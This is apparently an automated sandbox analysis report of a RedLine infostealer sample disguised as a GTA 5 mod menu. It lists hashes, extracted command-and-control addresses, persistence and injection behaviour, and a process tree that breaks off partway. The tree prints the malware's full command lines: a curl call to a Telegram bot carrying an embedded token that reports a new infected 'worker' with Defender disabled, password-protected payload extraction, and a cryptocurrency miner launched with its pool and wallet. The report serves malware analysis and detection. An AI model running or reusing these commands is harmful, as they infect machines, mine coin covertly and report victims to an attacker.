redline | d9ab32db1d3868cc361bd84eedecb0cdfe069e2e0ac6e64fc8efaff1e0df507d

Analysis

max time kernel
151s
max time network
152s
platform
windows10_x64
resource
win10-en-20211208
submitted
14-12-2021 06:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GTA 5 mod menu.exe
Size

824KB
MD5

14864038651d6da1754cb6adc665df38
SHA1

8da68bae81ae654bbe5d1d2c8a33f7df4fa543b5
SHA256

d9ab32db1d3868cc361bd84eedecb0cdfe069e2e0ac6e64fc8efaff1e0df507d
SHA512

54bcff8a073d6dda453d1d12e0849c08c610189ab4033cfc1e05637dc06cf2b4eaf9690b12edaf95ad23df03530abbd3d2d40fea1435379f56fea2df0716adf1

Score

10^/10

redline cheat xxluchxx1 discovery infostealer persistence spyware stealer

Malware Config

Extracted

Family

redline

185.183.35.89:2378

Extracted

Family

redline

Botnet

xxluchxx1

212.86.102.63:62907

Extracted

Family

redline

Botnet

cheat

185.112.83.21:21142

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1344-120-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/1344-121-0x000000000041C0DE-mapping.dmp	family_redline
behavioral2/memory/2456-154-0x0000000004D50000-0x0000000004D68000-memory.dmp	family_redline
behavioral2/memory/2312-168-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/2312-169-0x000000000041933E-mapping.dmp	family_redline
behavioral2/memory/1624-171-0x00000000004193DE-mapping.dmp	family_redline
behavioral2/memory/1624-170-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Downloads MZ/PE file

Executes dropped EXE 32 IoCs

Processes:

safas2f.exewhw.exesadasd.exe7z.exe7z.exesvchost.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe7z.exeRegHost.exe7z.exe

pid	process
4072	safas2f.exe
1000	whw.exe
2456	sadasd.exe
3868	7z.exe
2108	7z.exe
1608	svchost.exe
1444	RegHost.exe
372	7z.exe
3488	7z.exe
2952	RegHost.exe
3272	7z.exe
3132	7z.exe
2168	RegHost.exe
1572	7z.exe
828	7z.exe
2632	RegHost.exe
4064	7z.exe
68	7z.exe
2560	RegHost.exe
3104	7z.exe
3876	7z.exe
368	RegHost.exe
308	7z.exe
3596	7z.exe
3580	RegHost.exe
3856	7z.exe
4068	7z.exe
2064	RegHost.exe
1324	7z.exe
1316	7z.exe
3860	RegHost.exe
3760	7z.exe

Loads dropped DLL 19 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

pid	process
3868	7z.exe
2108	7z.exe
372	7z.exe
3488	7z.exe
3272	7z.exe
3132	7z.exe
1572	7z.exe
828	7z.exe
4064	7z.exe
68	7z.exe
3104	7z.exe
3876	7z.exe
308	7z.exe
3596	7z.exe
3856	7z.exe
4068	7z.exe
1324	7z.exe
1316	7z.exe
3760	7z.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exesafas2f.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	safas2f.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

safas2f.exeexplorer.exebfsvc.exeRegHost.exeexplorer.exebfsvc.exeRegHost.exeexplorer.exebfsvc.exeRegHost.exeexplorer.exebfsvc.exeRegHost.exeexplorer.exebfsvc.exeRegHost.exeexplorer.exebfsvc.exeRegHost.exeexplorer.exebfsvc.exeRegHost.exeexplorer.exebfsvc.exe

pid	process
4072	safas2f.exe
4072	safas2f.exe
3760	explorer.exe
3128	bfsvc.exe
3760	explorer.exe
3128	bfsvc.exe
3128	bfsvc.exe
3128	bfsvc.exe
1444	RegHost.exe
1444	RegHost.exe
3124	explorer.exe
2588	bfsvc.exe
3124	explorer.exe
2588	bfsvc.exe
2588	bfsvc.exe
2588	bfsvc.exe
2952	RegHost.exe
2952	RegHost.exe
1972	explorer.exe
1972	explorer.exe
1668	bfsvc.exe
1668	bfsvc.exe
1668	bfsvc.exe
1668	bfsvc.exe
2168	RegHost.exe
2168	RegHost.exe
2064	explorer.exe
2064	explorer.exe
3804	bfsvc.exe
3804	bfsvc.exe
3804	bfsvc.exe
3804	bfsvc.exe
2632	RegHost.exe
2632	RegHost.exe
832	explorer.exe
832	explorer.exe
1196	bfsvc.exe
1196	bfsvc.exe
1196	bfsvc.exe
1196	bfsvc.exe
2560	RegHost.exe
2560	RegHost.exe
3004	explorer.exe
1368	bfsvc.exe
3004	explorer.exe
1368	bfsvc.exe
1368	bfsvc.exe
1368	bfsvc.exe
368	RegHost.exe
368	RegHost.exe
1572	explorer.exe
2368	bfsvc.exe
1572	explorer.exe
2368	bfsvc.exe
2368	bfsvc.exe
2368	bfsvc.exe
3580	RegHost.exe
3580	RegHost.exe
3152	explorer.exe
3392	bfsvc.exe
3152	explorer.exe
3392	bfsvc.exe
3392	bfsvc.exe
3392	bfsvc.exe

Suspicious use of SetThreadContext 21 IoCs

Processes:

GTA 5 mod menu.exesadasd.exewhw.exesafas2f.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

description	pid	process	target process
PID 3160 set thread context of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 2456 set thread context of 2312	2456	sadasd.exe	ngentask.exe
PID 1000 set thread context of 1624	1000	whw.exe	RegAsm.exe
PID 4072 set thread context of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 set thread context of 3760	4072	safas2f.exe	explorer.exe
PID 1444 set thread context of 2588	1444	RegHost.exe	bfsvc.exe
PID 1444 set thread context of 3124	1444	RegHost.exe	explorer.exe
PID 2952 set thread context of 1668	2952	RegHost.exe	bfsvc.exe
PID 2952 set thread context of 1972	2952	RegHost.exe	explorer.exe
PID 2168 set thread context of 3804	2168	RegHost.exe	bfsvc.exe
PID 2168 set thread context of 2064	2168	RegHost.exe	explorer.exe
PID 2632 set thread context of 1196	2632	RegHost.exe	bfsvc.exe
PID 2632 set thread context of 832	2632	RegHost.exe	explorer.exe
PID 2560 set thread context of 1368	2560	RegHost.exe	bfsvc.exe
PID 2560 set thread context of 3004	2560	RegHost.exe	explorer.exe
PID 368 set thread context of 2368	368	RegHost.exe	bfsvc.exe
PID 368 set thread context of 1572	368	RegHost.exe	explorer.exe
PID 3580 set thread context of 3392	3580	RegHost.exe	bfsvc.exe
PID 3580 set thread context of 3152	3580	RegHost.exe	explorer.exe
PID 2064 set thread context of 908	2064	RegHost.exe	bfsvc.exe
PID 2064 set thread context of 68	2064	RegHost.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3176 1608 WerFault.exe svchost.exe

pid	pid_target	process	target process
3176	1608	WerFault.exe	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

RegAsm.exesadasd.exeRegAsm.exeexplorer.exesvchost.exeexplorer.exeexplorer.exe

pid	process
1344	RegAsm.exe
1344	RegAsm.exe
2456	sadasd.exe
2456	sadasd.exe
1344	RegAsm.exe
1624	RegAsm.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
1624	RegAsm.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
1608	svchost.exe
1608	svchost.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3760	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
3124	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

RegAsm.exesadasd.exengentask.exeRegAsm.exe7z.exe7z.exesvchost.exe7z.exe7z.exe7z.exe7z.exeWerFault.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeDebugPrivilege	1344	RegAsm.exe
Token: SeDebugPrivilege	2456	sadasd.exe
Token: SeDebugPrivilege	2312	ngentask.exe
Token: SeDebugPrivilege	1624	RegAsm.exe
Token: SeRestorePrivilege	3868	7z.exe
Token: 35	3868	7z.exe
Token: SeSecurityPrivilege	3868	7z.exe
Token: SeSecurityPrivilege	3868	7z.exe
Token: SeRestorePrivilege	2108	7z.exe
Token: 35	2108	7z.exe
Token: SeSecurityPrivilege	2108	7z.exe
Token: SeSecurityPrivilege	2108	7z.exe
Token: SeDebugPrivilege	1608	svchost.exe
Token: SeRestorePrivilege	372	7z.exe
Token: 35	372	7z.exe
Token: SeSecurityPrivilege	372	7z.exe
Token: SeSecurityPrivilege	372	7z.exe
Token: SeRestorePrivilege	3488	7z.exe
Token: 35	3488	7z.exe
Token: SeSecurityPrivilege	3488	7z.exe
Token: SeSecurityPrivilege	3488	7z.exe
Token: SeRestorePrivilege	3272	7z.exe
Token: 35	3272	7z.exe
Token: SeSecurityPrivilege	3272	7z.exe
Token: SeSecurityPrivilege	3272	7z.exe
Token: SeRestorePrivilege	3132	7z.exe
Token: 35	3132	7z.exe
Token: SeSecurityPrivilege	3132	7z.exe
Token: SeSecurityPrivilege	3132	7z.exe
Token: SeDebugPrivilege	3176	WerFault.exe
Token: SeRestorePrivilege	1572	7z.exe
Token: 35	1572	7z.exe
Token: SeSecurityPrivilege	1572	7z.exe
Token: SeSecurityPrivilege	1572	7z.exe
Token: SeRestorePrivilege	828	7z.exe
Token: 35	828	7z.exe
Token: SeSecurityPrivilege	828	7z.exe
Token: SeSecurityPrivilege	828	7z.exe
Token: SeRestorePrivilege	4064	7z.exe
Token: 35	4064	7z.exe
Token: SeSecurityPrivilege	4064	7z.exe
Token: SeSecurityPrivilege	4064	7z.exe
Token: SeRestorePrivilege	68	7z.exe
Token: 35	68	7z.exe
Token: SeSecurityPrivilege	68	7z.exe
Token: SeSecurityPrivilege	68	7z.exe
Token: SeRestorePrivilege	3104	7z.exe
Token: 35	3104	7z.exe
Token: SeSecurityPrivilege	3104	7z.exe
Token: SeSecurityPrivilege	3104	7z.exe
Token: SeRestorePrivilege	3876	7z.exe
Token: 35	3876	7z.exe
Token: SeSecurityPrivilege	3876	7z.exe
Token: SeSecurityPrivilege	3876	7z.exe
Token: SeRestorePrivilege	308	7z.exe
Token: 35	308	7z.exe
Token: SeSecurityPrivilege	308	7z.exe
Token: SeSecurityPrivilege	308	7z.exe
Token: SeRestorePrivilege	3596	7z.exe
Token: 35	3596	7z.exe
Token: SeSecurityPrivilege	3596	7z.exe
Token: SeSecurityPrivilege	3596	7z.exe
Token: SeRestorePrivilege	3856	7z.exe
Token: 35	3856	7z.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

GTA 5 mod menu.exeRegAsm.exesafas2f.exesadasd.exewhw.execmd.execmd.exe

description	pid	process	target process
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 3160 wrote to memory of 1344	3160	GTA 5 mod menu.exe	RegAsm.exe
PID 1344 wrote to memory of 4072	1344	RegAsm.exe	safas2f.exe
PID 1344 wrote to memory of 4072	1344	RegAsm.exe	safas2f.exe
PID 1344 wrote to memory of 1000	1344	RegAsm.exe	whw.exe
PID 1344 wrote to memory of 1000	1344	RegAsm.exe	whw.exe
PID 1344 wrote to memory of 2456	1344	RegAsm.exe	sadasd.exe
PID 1344 wrote to memory of 2456	1344	RegAsm.exe	sadasd.exe
PID 1344 wrote to memory of 2456	1344	RegAsm.exe	sadasd.exe
PID 4072 wrote to memory of 2620	4072	safas2f.exe	cmd.exe
PID 4072 wrote to memory of 2620	4072	safas2f.exe	cmd.exe
PID 2456 wrote to memory of 1284	2456	sadasd.exe	CasPol.exe
PID 2456 wrote to memory of 1284	2456	sadasd.exe	CasPol.exe
PID 2456 wrote to memory of 1284	2456	sadasd.exe	CasPol.exe
PID 2456 wrote to memory of 2440	2456	sadasd.exe	dfsvc.exe
PID 2456 wrote to memory of 2440	2456	sadasd.exe	dfsvc.exe
PID 2456 wrote to memory of 1020	2456	sadasd.exe	EdmGen.exe
PID 2456 wrote to memory of 1020	2456	sadasd.exe	EdmGen.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 2456 wrote to memory of 2312	2456	sadasd.exe	ngentask.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 1000 wrote to memory of 1624	1000	whw.exe	RegAsm.exe
PID 4072 wrote to memory of 2972	4072	safas2f.exe	cmd.exe
PID 4072 wrote to memory of 2972	4072	safas2f.exe	cmd.exe
PID 2972 wrote to memory of 3868	2972	cmd.exe	7z.exe
PID 2972 wrote to memory of 3868	2972	cmd.exe	7z.exe
PID 4072 wrote to memory of 1700	4072	safas2f.exe	cmd.exe
PID 4072 wrote to memory of 1700	4072	safas2f.exe	cmd.exe
PID 1700 wrote to memory of 2108	1700	cmd.exe	7z.exe
PID 1700 wrote to memory of 2108	1700	cmd.exe	7z.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe
PID 4072 wrote to memory of 3128	4072	safas2f.exe	bfsvc.exe

C:\Users\Admin\AppData\Local\Temp\GTA 5 mod menu.exe
"C:\Users\Admin\AppData\Local\Temp\GTA 5 mod menu.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3160

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344

C:\Users\Admin\AppData\Roaming\safas2f.exe
"C:\Users\Admin\AppData\Roaming\safas2f.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5083425773:AAHwdCOmptMgnitKuwgje7mHWm43LcalbBY/sendMessage?chat_id=-791710324&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0A(Windows Defender has been turned off)"
4⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
- Suspicious use of WriteProcessMemory
PID:2972

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3128

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3760

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:1444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
6⤵
PID:3776

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
6⤵
PID:2212

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2588

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3124

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
8⤵
PID:3200

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
8⤵
PID:1368

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3132

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
8⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1668

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
8⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1972

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
10⤵
PID:768

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
10⤵
PID:2280

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3804

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2064

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
11⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
12⤵
PID:4072

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
